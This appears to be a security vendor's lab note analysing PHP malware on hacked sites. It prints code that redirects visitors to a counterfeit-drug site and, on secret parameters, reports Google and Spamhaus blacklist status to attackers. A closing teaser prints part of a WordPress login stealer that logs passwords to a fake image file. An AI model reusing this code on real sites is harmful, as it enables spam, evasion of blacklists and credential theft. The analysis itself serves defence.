Blacklist Monitoring for Hackers and Webmasters

Labs Note

An infected site can be efficient for cyber-criminals unless it gets blacklisted. Traffic significantly drops when a URL is on the Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign directly correlates to absence of the server in anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


if ($_GET['mod']){
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
      $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
      if($g_out){
        header('HTTP/1.1 202');
        exit;
      }
  }

  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  header('HTTP/1.1 201');
  exit;
}

header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it’s just a web spam malware that redirects visitors to a site that sells counterfeit drugs. But if you pass certain parameters to this script it will check whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned via an HTTP code:

  • 201 – not blacklisted
  • 202 – blacklisted by Google
  • 203 – blacklisted by Spamhaus.org

The use of HTTP codes instead of human readable results makes us think that this functionality is used by a C&C server that regularly polls blacklisting information from all compromised sites.

While this sort monitoring may be useful to hackers, it’s even more useful to normal site owners who risk their business and reputation if their sites get blacklisted. For them, it is important to be able investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If websites get blacklisted for any reason, not only do we inform the site owners about it, but also help clean and remove their sites from the blacklists.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post